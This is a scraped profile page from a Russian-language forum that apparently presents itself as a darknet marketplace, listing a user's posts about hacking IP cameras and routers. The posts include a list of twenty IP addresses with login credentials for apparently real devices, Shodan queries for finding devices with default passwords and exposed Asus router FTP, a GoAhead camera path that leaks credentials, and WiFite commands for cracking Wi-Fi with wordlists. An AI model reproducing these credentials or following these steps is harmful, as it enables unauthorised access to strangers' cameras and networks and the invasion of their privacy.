Jump to content
автогарант Депозитарий

DJ1N

НЕ ПРОВЕРЕН ? НЕ ПРОВЕРЕН ?
  • Content Count

    9
  • Joined

  • Last visited

  • Days Won

    4
  • Time Online

    3д 2ч 51м 17с
My Favorite Songs

DJ1N last won the day on May 13

DJ1N had the most liked content!

3 Followers

Дополнительная информация

  • Регион
    KK
  • Квалификация
    Хакер

Торговая информация

  • Сделок: 0 Сделок: 0
  • Депозит: 0 Депозит: 0

Recent Profile Visitors

The recent visitors block is disabled and is not being shown to other users.

  1. Всем пмривет я вас научу взлому камер и роултеров. Для этого необходимо собрать 100 коментариев под этим постом. Каждому кто подпишится буду скидывать халявные 5 взломанных камер(ip/login/password).
  2. Hello my devils. Here's a list of cameras. 1. 89.155.77.140 Ip camera admin 1234 2. 84.195.9.164 WiFi-r admin 1234 3. 203.204.56.29 WiFi- r admin 1234 4. 101.3.112.49 WiFi- r admin 1111 5. 112.105.8.59 WiFi- r admin 1234 6. 113.61.130.37 WiFi- r admin 1234 7. 112.105.61.27 (Wi-Fi Protected Setup) admin 1234 8. 88.199.53.30 Точка доступа admin 1234 9. 106.107.217.117 Wifi-r admin 1234 10. 75.188.225.133 Точка доступа admin 1234 11. 93.91.51.95:83 Ip-camera koleso77 77martin77 12. 106.107.160.234 Wi-Fi-r admin 1234 13. 159.118.73.64 Wifi-r admin 1234 14. 1.64.75.201 Wfi-r admin 1234 15. 134.19.173.164 Wi-Fi-r admin 1234 16. 179.8.11.253:81 Camera admin 1234 17. 70.114.97.224:81 Camera admin 18. 74.78.96.5:81 Camera admin Snow1344 19. 84.220.18.170:81 Camera admin 15477281 20. 92.116.164.197:81 Camera admin Iguana1965
  3. К интернету подключено множество устройств с дефолтными логинами и паролями, вот именно они нам и интересны . Для этого в строке поиска пишем «default+password». Добавим также port:80, чтобы выбрать устройства с www-аутентификацией. В результате мы увидим множество баннеров, содержащих искомую фразу, и, как показывает практика, большой процент устройств будут иметь логин/пароль вида admin/password, admin/pass.(зачистую admin и 1234) Все действия делаются строго с vpn в поисковом сервисе shodan. Как взламывать камеры рассказывал в других статьях.
  4. Взлом роутеров Asus в Shodan Нас сейчас интересуют роутеры Asus, которые имеют уязвимость, что бы найти эти устройства в сети, достаточно вбить в поисковике следующий запрос: «asus 230 port:”21″» Так же можно добавить разные параметры, например: country:”RU” City — поиск в определенном городе: apache city:"Paris" Далее, берем любой IP который выдал нам поисковик Shodan, копируем его, а затем достаточно в том же браузере (в адресной строке), написать “ftp://” и вставить тот самый IP адрес, который мы копировали чуть ранее. В итоге мы получаем доступ к файлам через ftp, далее, можно следовать что имеется в наличии. Таким образом можно найти множества интересной информации: И все эти файлы находятся в свободном доступе, а это могут быть фотографии, документы и так далее. И если данная информация попадет не в те руки, могут быть последствия.
  5. Справка по WiFite опциональные аргументы: -h, --help показать справку и выйти НАСТРОЙКИ: -i [interface] Беспроводной интерфейс для использования (по умолчанию: спрашивать) -c [channel] Беспроводные каналы для сканирования (по умолчанию: все каналы) -5, --5ghz Включая 5Ghz каналы (по умолчанию: выключено) -b [bssid] BSSID (например, AA:BB:CC:DD:EE:FF) точки доступа для атаки -e [essid] ESSID (имя) точки доступа для атаки -v, --verbose Вербальный режим, печатать все строки (по умолчанию: тихий) WEP: --wep Показывать только сети с шифрованием WEP (по умолчанию: выключено) --require-fakeauth Атака не удалась, если не удалась фальшивая аутентификация (по умолчанию: выключено) --pps [pps] Пакетов в секунду для восроизведения (по умолчанию: 600 pps) --wept [секунды] Ожидать секунд перед неудачей (по умолчанию: 600 секунд) --wepca [ivs] Запустить взлом на этом количестве IVs (по умолчанию: 10000 ivs) --weprs [секунды] Перезапустить aireplay если не появляются новые IVs (по умолчанию: 11 секунд) --weprc [секунды] Перезапустить aircrack после этой задержки (по умолчанию: 30 секунд) --arpreplay Использовать WEP атаку ARP-воспроизведения (по умолчанию: включено) --fragment Использовать атаку WEP фрагментации (по умолчанию: включено) --chopchop Использовать WEP атаку чоп-чоп (по умолчанию: включено) --caffelatte Использовать WEP атаку Кафе латте (по умолчанию: включено) --p0841 Использовать WEP атаку p0841 (по умолчанию: включено) --hirte Использовать WEP атаку ARP-воспроизведения (по умолчанию: включено) WPA: --wpa Показывать только сети с WPA шифрованием (включая WPS) --wpadt [секунды] Время ожидания перед отправкой деаутентификации (по умолчанию: 10 секунд) --wpat [секунды] Время ожидания, чтобыб признать атаку WPA неудачной (по умолчанию: 500 секунд) --hs-dir [dir] Директория для сохранения рукопожатий files (по умолчанию: hs) --dict [файл] Файл, содержащий пароли для взлома (по умолчанию: None) --strip Очистить ненужные пакеты из захваченного рукопожатия используя tshark или pyrit WPS: --wps Показывать только сети с WPS --reaver Использовать ТОЛЬКО Reaver на WPS сетях (по умолчанию: выключено) --no-reaver НЕ использовать Reaver на WPS сетях (по умолчанию: выключено) --pixie Использовать только атаку WPS Pixie-Dust (по умолчанию: выключено) --pixiet [секунды] Время ожидания перед признанием атаки PixieDust неудачной (по умолчанию: 300 секунд) --pixiest [секунды] Время ожидания для шага прогресса перед признанием атаки PixieDust неудачной (по умолчанию: 30 секунд) --wpst [секунды] Время ожидания перед признанием атаки WPS PIN неудачной (по умолчанию: 600 секунд) --wpsmr [попытки] Максимальное количество попыток перед признанием неудачи (по умолчанию: 20) --wpsmf [fails] Максимальное число неудач Reaver перед признанием атаки провалившейся (по умолчанию: 30) --wpsmt [timeouts] Максимальное количество таймаутов перед остановкой (по умолчанию: 30) --ignore-ratelimit Игнорировать атаку, если WPS ограничен по скорости (по умолчанию: включено) КОМАНДЫ: --cracked Показать ранее взломанные точки доступа Как запустить WiFite 1. ifconfig wlan0 down && iwconfig wlan0 mode monitor && ifconfig wlan0 up 2. cp /usr/share/wordlists/rockyou.txt.gz . 3. gunzip rockyou.txt.gz 4. cat rockyou.txt | sort | uniq | pw-inspector -m 8 -M 63 > newrockyou.txt Установка 1. git clone https://github.com/derv82/wifite2.git 2. cd wifite2/ 3. sudo ./Wifite.py --help Скачиваем из интернета брут словарь. Дальше вводим данный скрипт: wifite --dict home/ваш аккаунт/Загрузки/дириктория папки с поролями или sudo wifite --crack --dict ~/newrockyou.txt --all (отака на все точки сети) После того как вы введете этот скрипт у вас появится данная картинка: Нам нужно нажать ctrl-c и выбрать номер сети. Далее программа начинае подбор и при успешном подборе сохраняет его в папке.
  6. К интернету подключено множество устройств с дефолтными логинами и паролями, вот именно они нам и интересны . Для этого в строке поиска пишем «default+password». Добавим также port:80, чтобы выбрать устройства с www-аутентификацией. В результате мы увидим множество баннеров, содержащих искомую фразу, и, как показывает практика, большой процент устройств будут иметь логин/пароль вида admin/password, admin/pass.(зачистую admin и 1234) Все действия делаются строго с vpn в поисковом сервисе shodan. Как взламывать камеры рассказывал в других статьях.
  7. И так начнем с того, что такое Shodan: Shodan — это первая (и, пожалуй, ведущая) поисковая система по Интернету вещей, существующая уже более семи лет. Shodan назвали в честь главного злодея (точнее, злодейки) в серии компьютерных игр System Shock — в игре это был крайне злобный искусственный интеллект. Конечно, эта поисковая система не настолько безжалостна, как ее прототип, но и она способна причинить немало вреда. Заходим в поисковик Shodan Регамся (порядка 2 минут). Далее вводим в поисковую страку<realm="GoAhead", domain=":81" port:81> Нам видно множество разных Ip камер. Заходим на любой из них (нужно нажать на квадратик со стрелочкой). Нас просят ввести логин и пороль, но нам это пока, что не инетересно. Нам нужно ввести в адресную строку после ip камеры данную комбинацию</system.ini?loginuse&loginpas> Как только мы это ввели, в загрузки должен прилететь файл с логином и поролем от камеры. Если вам понравилась статья прошу оставить отзыв и подписаться)
  8. DJ1N

    Взлом камер

    И так начнем с того, что такое Shodan: Shodan — это первая (и, пожалуй, ведущая) поисковая система по Интернету вещей, существующая уже более семи лет. Shodan назвали в честь главного злодея (точнее, злодейки) в серии компьютерных игр System Shock — в игре это был крайне злобный искусственный интеллект. Конечно, эта поисковая система не настолько безжалостна, как ее прототип, но и она способна причинить немало вреда. 1. Заходим в поисковик Shodan 2. Регамся (порядка 2 минут). 3.Далее вводим в поисковую страку <realm="GoAhead", domain=":81" port:81> Нам видно множество разных Ip камер. 4.Заходим на любой из них (нужно нажать на квадратик со стрелочкой). Нас просят ввести логин и пороль, но нам это пока, что не инетересно. 5. Нам нужно ввести в адресную строку после ip камеры данную комбинацию</system.ini?loginuse&loginpas> Как только мы это ввели, в загрузки должен прилететь файл со скриптом где есть с логин и пороль от камеры. 6. Обновляем страницу с входом в камеру и вводим логин и пароль. Если вам понравилась публикация, прошу оставить комент и подписаться.
  9. Кто хочет научится взламывать камеры и роултеры оставляйте коменты. За потписку отдам халявные 5 взломанных камер каждому пользователю.
Пользователь регулярно проводит сделки через гарант сервис и имеет положительную торговую статистику на площадке. Скорее всего ему можно доверять и работать напрямую. С правилами работы через гарант вы можете ознакомится тут.
Пользователь не провел ни одной сделки через гарант. О правилах работы через гарант вы можете ознакомиться тут.
Пользователь внес страховой депозит на форуме. Является проверенным селлеров и гарантированно проводит все сделки через гарант сервис Даркнета. Подробнее о системе депозитов вы можете прочитать тут.
Пользователь не имеет обеспечительного депозита на форуме, при работе с ним не отправляйте предоплату и всегда привлекайте гаранта к сделкам. Подробнее о системе депозитов вы можете прочитать тут.
Статус пользователя "НЕ ПРОВЕРЕН" гласит о том, что он не прошел верификацию своего аккаунта в Даркнете. Верификацию можно пройти предоставив положительные отзывы и рекомендации о себе. Подробнее о том, как пройти верификацию Вы можете прочитать тут.
Статус пользователя "ПРОВЕРЕННЫЙ" говорит о том, что селлер прошел проверку своих товаров или услуг у Администрации Даркнета. Подробнее о том, как пройти проверку вы можете прочитать тут.
×